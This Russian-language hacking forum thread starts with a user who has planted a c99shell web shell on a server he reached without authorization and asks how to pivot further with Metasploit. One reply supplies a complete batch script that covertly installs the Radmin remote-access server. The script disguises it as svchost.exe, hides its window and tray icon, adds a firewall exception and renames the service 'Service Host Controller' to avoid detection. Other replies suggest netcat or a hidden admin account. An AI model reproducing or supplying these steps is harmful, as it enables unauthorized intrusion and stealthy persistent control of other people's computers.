всем привет. проблема вот в чем. Недавно обнаружился у друзей вайфай с халявным инетом.нашел первый попавшийся комп с сервером, чуть поднапрягся и залил туда c99shell, сейчас все работает. как оказалось, это был один из основных компов довольно крупной сети. на данный момент мой внутренний ип вайфай сети 11.0.0.105. мне нужен комп из внешней сети с ипом 192.168.11.53. что в планах: использовать метасплоит, но проблема в том что я не смогу законектиться с нужным компом, так как нахожесь во внутренней сети. хочу залить на поломанный серв метасплоит и уже с него ломать. но опять же мне нужна оболочка для управления поломанным компом, чтоб можно было залить исполняемый файл через с99 и тупо запустить, законнектиться и юзать метасплоит для дальнейших действий. так вот в чем вопрос: подскажите какую нибудь оболочку, чтоб можно было просто залить, запустить и законектиться, разумеется без установки. спасибо
тут подумал... msfweb может разрешить доступ извне? например сейчас залью и просто зайду на серв и с него уже буду работать дальше ------------ не, консоль привычней
ты хоть сам понял чего понаписал? предложу варианты: rdp, radmin (radmin есть на форуме не палящийся в трее) Если конечно тру хеккер =) netcat тебе в помощь =) PS "из внешней сети с ипом 192.168.11.53." =)
ты меня чуток не понял да и я толком объяснить не смог. уже неважно. теперь на серве есть netcat. поискал гуглем как поставить metasploit на винду из консоли, чтоб без всяких окошек. ничего толкового не нашел. есть предложения?
настрой на сломанной машине второго юзера-админа, запусти удалённый рабочий стол и сиди как у себя дома, в чём проблема ?
Залей радмин 2.1: 3 файла admdll.dll raddrv.dll svchost.exe - ну это екзешник серва радмина r_server.exe Запустишь через шелл в консоле батник: Code: cmdow @ /HID copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start Он сначало копирнет длл и сам сервак в /Windows/ Потом дабавит в бредмаузер исключение(если включен) Уберет иконку радмина Переименует службу радмина на Service Host Controller Чтобы не палили И установит+стартует сам радмин
У меня вопрос . Вот залили мы эти 3 файла admdll.dll raddrv.dll svchost.exe и bat-ник , запустили его что бы в трее иконка не выскакивала и прочее выполнилось ..... Разве в реестре появится ключ радминовский, ведь мы не устанавливили Radmin , а просто кинули библиотеки и сервак на удаленный комп ? Если ключ не появится , то где менять значение параметра отображения иконки в трее? Уф, мой первый вопрос )
